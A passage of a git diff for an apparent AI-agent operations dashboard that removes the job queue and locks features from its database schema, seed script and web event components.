text("priority").notNull(), - goal: text("goal", { mode: "json" }).notNull(), - environment: text("environment", { mode: "json" }).notNull(), - repo: text("repo").notNull(), - branch: text("branch").notNull(), - retryPolicy: text("retry_policy", { mode: "json" }).notNull(), - concurrencyLimits: text("concurrency_limits", { mode: "json" }).notNull(), - runIds: text("run_ids", { mode: "json" }).notNull(), - sessionId: text("session_id"), - attempt: integer("attempt").notNull().default(0), - maxAttempts: integer("max_attempts").notNull().default(3), - queuedAt: text("queued_at").notNull(), - dispatchedAt: text("dispatched_at"), - completedAt: text("completed_at"), - createdAt: text("created_at").notNull(), - updatedAt: text("updated_at").notNull(), -}); - // ─── Sessions table ──────────────────────────────────────────────────────── export const sessions = sqliteTable("sessions", { @@ -119,18 +96,6 @@ export const events = sqliteTable("events", { timestamp: text("timestamp").notNull(), }); -// ─── Locks table ─────────────────────────────────────────────────────────── - -export const locks = sqliteTable("locks", { - id: text("id").primaryKey(), - lockType: text("lock_type").notNull(), - resource: text("resource").notNull(), - holderId: text("holder_id").notNull(), - acquiredAt: text("acquired_at").notNull(), - expiresAt: text("expires_at").notNull(), - released: integer("released", { mode: "boolean" }).notNull().default(false), -}); - // ─── Auth: users ─────────────────────────────────────────────────────────── export const users = sqliteTable("users", { diff --git a/packages/db/src/seed.ts b/packages/db/src/seed.ts index 40c5c95..e155cc2 100644 --- a/packages/db/src/seed.ts +++ b/packages/db/src/seed.ts @@ -1363,10 +1363,6 @@ function seedSessions(db: AgentOpsDb): number { function seedEvents(db: AgentOpsDb): number { const EVENT_DEFS: Array<{ category: string; type: string; sourcePrefix: string; payloadFn: () => Record }> = [ - { category: EventCategory.Job, type: "job.queued", sourcePrefix: "job_", payloadFn: () => ({ priority: pick(["critical", "high", "normal", "low"]), repo: pick(REPOS) }) }, - { category: EventCategory.Job, type: "job.dispatched", sourcePrefix: "job_", payloadFn: () => ({ sessionId: `session_${uid()}`, dispatchedAt: new Date().toISOString() }) }, - { category: EventCategory.Job, type: "job.completed", sourcePrefix: "job_", payloadFn: () => ({ durationMs: randInt(30000, 600000), runCount: randInt(1, 5) }) }, - { category: EventCategory.Job, type: "job.failed", sourcePrefix: "job_", payloadFn: () => ({ reason: pick(["timeout", "crash", "policy violation", "resource exhaustion"]), attempt: randInt(1, 3) }) }, { category: EventCategory.Run, type: "run.started", sourcePrefix: "run_", payloadFn: () => ({ repo: pick(REPOS), branch: pick(BRANCHES) }) }, { category: EventCategory.Run, type: "run.completed", sourcePrefix: "run_", payloadFn: () => ({ durationMs: randInt(30000, 900000), costUsd: randFloat(0.10, 4.50) }) }, { category: EventCategory.Run, type: "run.failed", sourcePrefix: "run_", payloadFn: () => ({ error: pick(["test failure", "build error", "lint violation", "timeout"]), testsRun: randInt(5, 50) }) }, @@ -1513,10 +1509,8 @@ async function main() { // Clear existing seed data const { sql } = await import("drizzle-orm"); - db.run(sql`DELETE FROM locks`); db.run(sql`DELETE FROM events`); db.run(sql`DELETE FROM sessions`); - db.run(sql`DELETE FROM jobs`); db.run(sql`DELETE FROM policy_results`); db.run(sql`DELETE FROM run_metrics`); db.run(sql`DELETE FROM runs`); diff --git a/packages/web/src/app/events/EventLog.tsx b/packages/web/src/app/events/EventLog.tsx index f3c20b9..c821c6e 100644 --- a/packages/web/src/app/events/EventLog.tsx +++ b/packages/web/src/app/events/EventLog.tsx @@ -8,7 +8,6 @@ import { useEvents } from "@/hooks/useEvents"; const CATEGORIES = [ { label: "All", value: "" }, - { label: "Job", value: EventCategory.Job }, { label: "Run", value: EventCategory.Run }, { label: "Session", value: EventCategory.Session }, { label: "Policy", value: EventCategory.Policy }, diff --git a/packages/web/src/components/ActivityFeed.tsx b/packages/web/src/components/ActivityFeed.tsx index d5b6912..47b0dae 100644 --- a/packages/web/src/components/ActivityFeed.tsx +++ b/packages/web/src/components/ActivityFeed.tsx @@ -15,8 +15,6 @@ interface FeedEvent { function sourceLink(category: string, sourceId: string): string { switch (category) { - case "job": - return `/jobs/${sourceId}`; case "run": return `/runs/${sourceId}`; case "session": diff --git a/packages/web/src/components/EventCard.tsx b/packages/web/src/components/EventCard.tsx index f68d237..107d700 100644 --- a/packages/web/src/components/EventCard.tsx +++ b/packages/web/src/components/EventCard.tsx @@ -7,9 +7,6 @@ import { TimeAgo } from "./TimeAgo"; import Link from "next/link"; function getSourceLink(sourceId: string): { href: string; label: string } | null { - if (sourceId.startsWith("job_")) { - return { href: `/jobs/${sourceId}`, label: sourceId }; - } if (sourceId.startsWith("session_")) { return { href: `/sessions/${sourceId}`, label: sourceId }; } diff --git a/packages/web/src/components/EventCategoryBadge.tsx b/packages/web/src/components/EventCategoryBadge.tsx index b939251..0461d9c 100644 --- a/packages/web/src/components/EventCategoryBadge.tsx +++ b/packages/web/src/components/EventCategoryBadge.tsx @@ -1,7 +1,6 @@ import { EventCategory } from "@agentops/core"; const categoryColors: Record = { - [EventCategory.Job]: "bg-blue/15 text-blue border-blue/30", [EventCategory.Run]: "bg-green/15 text-green border-green/30", [EventCategory.Session]: "bg-yellow/15 text-yellow border-yellow/30", [EventCategory.Policy]: "bg-red/15 text-red border-red/30", diff --git a/packages/web/src/hooks/useEventSource.ts b/packages/web/src/hooks/useEventSource.ts index 48fd913..e7b1162 100644 --- a/packages/web/src/hooks/useEventSource.ts +++ b/packages/web/src/hooks/useEventSource.ts @@ -9,10 +9,6 @@ export type SSEEventType = | "run_updated" | "run_completed" | "run_failed" - | "job.queued" - | "job.dispatched" - | "job.completed" - | "job.failed" | "run.started" | "run.completed" | "run.failed" @@ -61,10 +57,6 @@ const ALL_EVENT_TYPES: SSEEventType[] = [ "run_updated", "run_completed", "run_failed", - "job.queued", - "job.dispatched", - "job.completed", - "job.failed", "run.started", "run.completed", "run.failed",